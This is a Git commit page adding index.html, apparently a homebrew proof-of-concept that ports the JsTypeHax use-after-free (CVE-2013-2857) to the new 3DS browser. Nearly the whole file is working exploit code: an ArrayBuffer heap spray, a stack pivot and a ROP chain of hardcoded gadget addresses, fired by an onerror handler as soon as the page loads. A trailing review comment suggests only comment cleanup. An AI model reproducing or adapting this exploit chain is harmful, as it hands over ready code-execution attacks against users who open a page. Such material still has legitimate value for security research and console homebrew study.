
Commit d695346

zoogie
authored and
zoogie
committed
Initial hax POC upload
This is a port of JsTypeHax for the WiiU: https://github.com/WiiUTest/JsTypeHax. All it does right now is dump SKATER's RAM to SD, but the exploit does work. Only works on new3ds.
1 parent 2173922 commit d695346


1 file changed

+102
-0
lines changed


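--- a/index.html
+++ b/index.html
@@ -0,0 +1,102 @@
+<!--
+Tested on 5.5.1
+CVE-2013-2857
+Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
+Result: Bug is present, crash
+types=["checkbox","color","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"]
+-->
+<script>
+
+function UaF3(a)
+{
+var bsize=0x2000000;
+var p = new ArrayBuffer(bsize);
+var payload = new Uint32Array(p);
+bsize=0x800000;
+
+for(var b=0;b<bsize/4;b++){
+//payload[b]=0x90000000+(b*4);
+payload[b]=0;
+}
+
+payload[(0x1ba000+0x18)/4]=0x09300000;
+payload[(0x1ba000)/4]=0x09300000;
+payload[(0x1ba000+0x14c)/4]=0x00ac144c; //ldmdb r0!, {ip, sp, lr, pc} (stack pivot)
+payload[(0x1ba000-0x4)/4]=0x001df60c; //POP_PC (pivot pc)
+payload[(0x1ba000-0x8)/4]=0x44444444; //GARBAGE (lr)
+payload[(0x1ba000-0xC)/4]=0x09310000; //ROP_ADDR (pivot sp)
+
+/*
+seg006:009DC170 LDR R0, [R5,#4]
+seg006:009DC172 LDR R0, [R0,#0x18]
+seg006:009DC174 LDR R1, [R0]
+seg006:009DC176 ADDS R1, #0xFF
+seg006:009DC178 ADDS R1, #0x41
+seg006:009DC17A LDR R1, [R1,#0xC]
+seg006:009DC17C BLX R1
+*/
+
+var POP_R0PC=0x00296e64;
+var POP_R1PC=0x0023e578;
+var POP_R0R3PC=0x00226d3c;
+var svcSleepThread=0x002d8cd4;
+var FS_MountSdmc=0x00318d30+4;
+var IFile_Open=0x003222e4+4;
+var IFile_Write=0x00327258+4;
+var GARBAGE=0x44444444;
+var FILE=0x09311000;
+//POP_R0R3PC=GARBAGE;
+
+
+//return;
+var rop=[
+POP_R0PC,
+0x2eccf2, // mc:
+FS_MountSdmc,
+GARBAGE,
+GARBAGE,
+GARBAGE,
+POP_R0R3PC,
+FILE,
+0x0931005c, // mc:/rd
+6,
+GARBAGE,
+IFile_Open,
+GARBAGE,
+GARBAGE,
+GARBAGE,
+GARBAGE,
+GARBAGE,
+POP_R0R3PC,
+FILE,
+FILE+32,
+0x100000,
+0x328000,
+IFile_Write,
+0x0063006d,
+0x002f003a,
+0x00640072,
+0
+]
+
+for(var i=0; i < rop.length; i++){
+payload[(0x1ba000+0x10000+(i*4))/4]=rop[i];
+}
+
+for(var i=0;i<1000;i++){
+var buf = new ArrayBuffer(0x18);
+var bufView = new Uint32Array(buf);
+bufView[0]=0x11131100;
+bufView[1]=0x09300000; //r5
+bufView[2]=0x39010018; //r6
+bufView[3]=0x44161400;
+bufView[4]=0xffffffff;
+bufView[5]=0x66181600;
+a.type="hidden";
+}
+
+return 0;
+}
+</script>
+
+<input type="image" onerror="UaF3(this);" src=""/>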
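Review bot: The header comment at the top of index.html is stale relative to the commit description: it still records `Result: Bug is present, crash` and a `types=[…]` list that nothing in the file reads, while the description says the page now writes a memory dump to SD. Replace those two comment lines with a single line stating what the page actually does and where it comes from, e.g. `Port of JsTypeHax (WiiU) to the 3DS browser, 5.5.1 / new3DS only; CVE-2013-2857. Currently dumps process memory to SD.` The commented-out lines `//POP_R0R3PC=GARBAGE;`, `//return;` and `//payload[b]=0x90000000+(b*4);` are leftover scaffolding and should be deleted rather than kept as comments. `POP_R1PC` and `svcSleepThread` are assigned but never referenced in `rop`; either drop them or add a one-line comment saying why they are retained.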
